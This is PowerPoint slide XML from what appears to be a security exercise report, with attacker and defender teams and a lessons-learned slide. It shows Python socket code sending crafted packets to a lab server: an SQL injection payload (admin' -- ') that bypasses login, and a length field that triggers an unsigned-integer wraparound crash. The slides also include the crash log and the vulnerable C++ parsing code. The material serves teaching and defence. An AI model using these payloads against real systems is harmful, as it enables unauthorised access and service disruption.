            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>x0B : id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>x61\x64\x6D\x69\x6E\x27\x20\x2D\x2D\x20\x27 :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admin’ -- ‘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pic>
        <p:nvPicPr>
          <p:cNvPr id="59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04706" y="5242560"/>
            <a:ext cx="74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dmin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2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Send the crafted packet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socket.socket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socket.AF_INET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socket.SOCK_STREAM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s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>(('192.168.0.228', 50000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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err="1" smtClean="0"/>
              <a:t>s.sendall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>'\x53\x42\x31\x54\x21\x00\x00\x00\xC7\x8C\x07\x3C\xE8\x03\x00\x00\x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0A\x0B\x61\x64\x6D\x69\x6E\x27\x20\x2D\x2D\x20\x27\x12\x02\x30\x30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>')</a:t>
            </a:r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50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4706" y="5242560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admin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3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SQL query on the server side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“SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>* from user where account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=‘“ + “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admin’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-- ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” + “’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=‘” 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“SELECT * from user where account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=‘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admin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’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-- ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’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and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=‘” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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“SELECT * from user where account=‘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admin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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>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Successfully login using SQL injection !!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0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6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04706" y="5242560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admin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V09 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extraction of name and face </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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 smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key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key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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obtain registered image and name</a:t>
            </a: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media.discordapp.net/attachments/844851665566826506/859947503066284042/blob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4399280"/>
            <a:ext cx="1991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media.discordapp.net/attachments/844851665566826506/85994788253479731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4399280"/>
            <a:ext cx="111760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key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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obtain registered image and name</a:t>
            </a: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rgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="세로로 말린 두루마리 모양 11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V12 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Crash by unsigned integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wraparound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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[WRAPAROUND] [CRAFTPACKET]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Craft packet causing server crash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\x53\x42\x31\x54</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x02\x00\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\xC7\x8C\x07\x3C\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\x03\x00\x00\xD4\x3D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\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x02\x00\x00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\x00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whole packet size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/>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="ko-KR" alt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0"/>
            <a:ext cx="12209241" cy="68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2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Send the crafted packet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socket.socket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socket.AF_INET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socket.SOCK_STREAM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s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>(('192.168.0.228', 50000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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err="1" smtClean="0"/>
              <a:t>s.sendall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(b'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>x53\x42\x31\x54</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x02\x00\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\xC7\x8C\x07\x3C\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\x03\x00\x00\xD4\x3D')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2796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3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>System crash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length=2  head=[SB1T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</a:t>
            </a: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msgtype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=1002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timestamp=-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890563053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…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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>libprotobuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> FATAL google/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>protobuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>/stubs/stringpiece.cc:50] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size too big</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: 18446744073709551602 details: string length exceeds max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>terminate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>called after throwing an instance of 'google::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>protobuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>FatalException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>():  size too big: 18446744073709551602 details: string length exceeds max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>size</a:t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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abort!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745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" y="518160"/>
            <a:ext cx="11216640" cy="596763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// ProtocolManager.cpp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err="1"/>
              <a:t>CBaseProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>CProtocolManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>parse_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>MyPacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ppkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>) {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CBaseProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean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cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>nullptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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 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size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size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ppkt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en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hdr.size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>MyPacketHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> */;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 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length=%d  head=[%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>c%c%c%c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>]\n", 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hdr.size,ppkt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[0],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[1],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[2],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[3]);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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(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[0]=='S' &amp;&amp;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[1]=='B' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp;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	     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hdr.head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[2]=='1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp; 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hdr.head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[3]=='T' ) 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>msgtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=%d\n",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hdr.msgtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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timestamp=%d\n",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hdr.timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>); 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cpkt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create_protocol_instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>MsgReq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)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hdr.msgtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>deSerialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ppkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt;payload, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> is too big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}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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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" y="518160"/>
            <a:ext cx="11216640" cy="596763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// ProtocolManager.cpp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CBaseProtocol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CProtocolManager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::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parse_packet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MyPacket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{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CBaseProtocol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nullptr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/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size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sizeof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MyPacketHeader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)/* 16 */;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length=%d  head=[%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c%c%c%c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]\n", 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hdr.size,ppkt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[0],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[1],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[2],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[3]);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if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[0]=='S' &amp;&amp;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[1]=='B'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&amp;&amp;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     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[2]=='1'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&amp;&amp; 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[3]=='T' )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=%d\n",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timestamp=%d\n",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hdr.timestamp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 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=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create_protocol_instance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MsgReq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if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deSerialize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-&gt;payload,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payload_size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 //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payload_size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is too big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}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return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}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5283" y="2518913"/>
            <a:ext cx="86264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/>
              <a:t>Do you think ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>payload_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" b="1" dirty="0" smtClean="0"/>
              <a:t>’ have an appropriate value???</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24146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Lessons learned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Threats were well defended against the parts we knew, but not other parts we don't know. So, it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>necessary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>advice from many experts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Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>the attack was mainly based on the low-hanging fruit, we felt that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>easily accessible attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> should be thoroughly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secured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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>deriving threats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> to identify it, there were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>too many false positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> threats. And it took a lot of effort to sort them out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We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>understood how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> works, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>and when applied, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>were surprised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>that vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>could be found in unexpected places</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Plus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, it's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>difficult to make the modeling rules based on the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>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B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Root of trust must be trustworthy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> to build a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>secure.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9657" y="812802"/>
            <a:ext cx="11843657" cy="58710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Separate meta data from image on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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57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9657" y="812802"/>
            <a:ext cx="11843657" cy="58710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Separate meta data from image on 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9447" y="1136652"/>
            <a:ext cx="5880577" cy="9541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allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anonymous users to access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> the system</a:t>
            </a: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7382314" y="2282901"/>
            <a:ext cx="3927953" cy="138499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 user data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> inside the target machine</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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6178170" y="3860038"/>
            <a:ext cx="5272315" cy="9541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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> user data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>over network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835" y="5006287"/>
            <a:ext cx="4100740" cy="138499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 secret key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> inside the target machine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2606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57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9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 rot="20118305">
            <a:off x="1345423" y="2958563"/>
            <a:ext cx="4734688" cy="923330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DEPENDER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75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02054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ko-KR" altLang="en-US" sz="4000">
              <a:solidFill>
                <a:schemeClr val="bg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32810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ko-KR" altLang="en-US" sz="40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0757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 rot="20118305">
            <a:off x="6114665" y="2958563"/>
            <a:ext cx="4734688" cy="923330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ATTACKER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" b="1">
              <a:solidFill>
                <a:srgbClr val="C0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2054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1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="400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2810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ko-KR" altLang="en-US" sz="4000">
              <a:solidFill>
